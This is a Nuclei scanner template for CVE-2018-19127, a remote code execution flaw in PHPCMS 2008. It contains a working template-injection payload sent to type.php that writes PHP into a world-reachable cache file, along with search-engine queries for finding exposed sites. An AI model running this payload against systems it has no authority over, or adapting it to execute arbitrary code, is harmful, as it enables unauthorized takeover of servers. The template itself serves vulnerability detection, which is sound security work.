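id: CVE-2018-19127

info:
  name: PHPCMS 2008 - Remote Code Execution via Template Injection
  author: tomaquet18
  severity: critical
  description: |
    PHPCMS 2008 suffers from an unauthenticated RCE via template injection in type.php, where attacker-supplied content is written into a PHP template cache file, which is then executable.
  impact: |
    Successful exploitation allows an unauthenticated attacker to achieve remote code execution on the server, potentially taking full control.
  remediation: |
    The vendor is unresponsive and PHPCMS 2008 is no longer maintained. Users are advised to stop using this software or restrict public access to it.
  reference:
    - https://github.com/ab1gale/phpcms-2008-CVE-2018-19127
    - https://github.com/advisories/GHSA-p498-q357-m3p7
    - https://nvd.nist.gov/vuln/detail/CVE-2018-19127
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-19127
    epss-score: 0.84485
    epss-percentile: 0.99342
    cwe-id: CWE-94
    cpe: cpe:2.3:a:phpcms:phpcms:2008:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"Powered by phpcms"
    fofa-query: body="Powered by phpcms"
    vendor: phpcms
    product: phpcms-2008
  # Tagged `intrusive`: this check is not a passive probe. The request in http(1) makes
  # the target write attacker-controlled PHP into data/cache_template/rss.tpl.php,
  # overwriting the site's cached RSS template. The file is not cleaned up afterwards.
  tags: cve,cve2018,phpcms,rce,ssti,vkev,vuln,intrusive

# http(1) fires the injection; because of `||`, the cache-file fetch in http(2) runs only
# when the first response does not already show the hash.
# NOTE(review): http(1)'s matcher is `internal: true`, so confirm that the flow engine still
# reports a finding when only http(1) matched and http(2) was short-circuited.
flow: http(1) || http(2)

variables:
  # Fixed seed; the proof-of-execution is md5(num) appearing in a response.
  # Quoted so YAML keeps it as a string rather than an integer.
  num: "999999999"
  # Template-injection payload: closes the `tag_` function, emits the hash, and the trailing
  # `{//../rss` path component makes PHPCMS name the cache file rss.tpl.php.
  payload: "tag_(){};echo(md5({{num}}));{//../rss"

http:
  - method: GET
    path:
      - "{{BaseURL}}/type.php?template={{payload}}"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "value=\"picture", "phpcms", "{{md5(num)}}")'
        condition: and
        # Internal: used only to drive the flow, not emitted as a finding on its own.
        internal: true

  # Fallback: fetch the cache file written by the first request and look for the hash.
  # This path is world-reachable, so the injected file stays exposed on the target after the scan.
  - method: GET
    path:
      - "{{BaseURL}}/data/cache_template/rss.tpl.php"

    matchers:
      - type: word
        words:
          - "{{md5(num)}}"
# NOTE: the digest below was computed over the original, unmodified template. Any edit
# (including the tag change above) invalidates it; re-sign with `nuclei -sign` or expect
# the template to be treated as unsigned.
# digest: 4a0a0047304502204c4da5b12ac378bf9fbbc761d7aef8c7c51195413a725d2da9c73a8b7be24784022100c61c91346c15fd5d1dd919b85d78a321f54ed6c62cd50a8c37156eb521d3c9ac:922c64590222798bb761d5b6d8e72950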